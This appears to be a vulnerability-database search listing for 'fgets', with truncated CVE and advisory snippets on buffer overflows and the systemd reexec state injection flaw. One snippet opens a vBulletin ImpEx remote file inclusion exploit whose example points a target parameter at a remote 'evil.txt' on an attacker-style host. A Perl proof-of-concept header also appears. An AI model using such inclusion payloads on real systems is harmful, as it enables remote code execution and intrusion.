60 matches found
CVE-2020-21533
In transfig's fig2dev 3.2.7b it is possible for an attacker to create a specially crafted file that causes a buffer overflow due to the usage of fgets. This leads to a denial of service, impacting availability of the program...
CVE-2020-21530
In transfig's fig2dev 3.2.7b it is possible for an attacker to create a specially crafted file that causes a buffer overflow due to usage of fgets. This leads to a denial of service via segmentation fault, impacting availability of the program...
systemd: reexec state injection: fgets() on overlong lines leads to line splitting
...
systemd: line splitting via fgets() allows for state injection during daemon-reexec
It was discovered that systemd is vulnerable to a state injection attack when deserializing the state of a service. Properties longer than LINE_MAX are not correctly parsed and an attacker may abuse this flaw in particularly configured services to inject, change, or corrupt the service state...
Privilege Escalation
libsystemd.so is vulnerable to privilege escalation. When NotifyAccess != none, the line read by fgets in the unit_deserialize function allows line splitting during daemon-reexec when long lines are submitted which can result in state injection. An attacker is able to exploit this vulnerability to...
systemd - reexec State Injection
systemd - reexec State Injection / I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports . When systemd re-executes (e.g. during a package upgrade), state is...
systemd - 'reexec' State Injection
/ I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports . When systemd re-executes (e.g. during a package upgrade), state is serialized into a memfd before the execv...
Linux systemd Line Splitting
systemd: reexec state injection: fgets on overlong lines leads to line splitting CVE-2018-15686 I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports . When system...
Linux systemd Line Splitting Exploit
Linux has an issue with systemd where overlong input to fgets during reexec state injection can lead to line splitting. systemd: reexec state injection: fgets on overlong lines leads to line splitting CVE-2018-15686 I am sending this bug report to Ubuntu, even though it's an upstream bug, as...
Internet Bug Bounty: integer overflow in fgets cause heap corruption
Please check: https://bugs.php.net/bug.php?id=73011...
libidn: denial of service
CVE-2015-8948 denial of service Solve out-of-bounds-read when reading one zero byte as input. Also replaced fgets with getline. Reported by Hanno Boeck. - CVE-2016-6261 denial of service Fix out-of-bounds stack read in idna_to_ascii_4i. Reported by Hanno Boeck. - CVE-2016-6262 denial of service...
Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun
No description provided by source. source: http://www.securityfocus.com/bid/8028/info A buffer overrun has been discovered in Tripbit Secure Code Analizer when reading data from source files. The problem occurs due to an insecure use of the fgets function. This vulnerability could be triggered by...
Mozilla Codesighs Memory Corruption
#!/usr/bin/perl # thedailyshow.pl AKA Mozilla Codesighs Memory Corruption PoC, Jeremy Brown, jbrownsec.blogspot.com, krakowlabs.com, 12.12.2009. 257 while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput)) (gdb) 259 trimWhite(lineBuffer); (gdb) trimWhite...
Mozilla Codesighs - Memory Corruption
#!/usr/bin/perl # thedailyshow.pl AKA Mozilla Codesighs Memory Corruption PoC, Jeremy Brown, jbrownsec.blogspot.com, krakowlabs.com, 12.12.2009. 257 while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput)) (gdb) 259 trimWhite(lineBuffer); (gdb) trimWhite...
Multiple FTP servers unsafe fgets() vulnerability
It's possible to embed additional commands into URLs...
vBulletin ImpEx <= 1.74 Remote Command Execution Exploit
No description provided by source. <?php /* vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? */ $cm...
Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun
// source: https://www.securityfocus.com/bid/8028/info A buffer overrun has been discovered in Tripbit Secure Code Analizer when reading data from source files. The problem occurs due to an insecure use of the fgets function. This vulnerability could be triggered by a malicious source file...
Tripbit Secure Code Analizer 1.0 - fgets() Local Buffer Overrun
Tripbit Secure Code Analizer 1.0 - fgets Local Buffer Overrun // source: https://www.securityfocus.com/bid/8028/info A buffer overrun has been discovered in Tripbit Secure Code Analizer when reading data from source files. The problem occurs due to an insecure use of the fgets function. This...
Re: unsafe fgets() in sendmail's mail.local
On Mon, Apr 24, 2000, 3APA3A wrote: Topic: unsafe fgets in sendmail's mail.local 1. Possibility to insert LMTP commands into e-mail message 2. Possibility of deadlock between sendmail and mail.local 3. Possibility to corrupt user's mailbox 4. Possibility to change e-mail headers of the message in...
unsafe fgets() in sendmail's mail.local
Topic: unsafe fgets in sendmail's mail.local Description: There are 4 problems: 1. Possibility to insert LMTP commands into e-mail message 2. Possibility of deadlock between sendmail and mail.local 3. Possibility to corrupt user's mailbox 4. Possibility to change e-mail headers of the message in...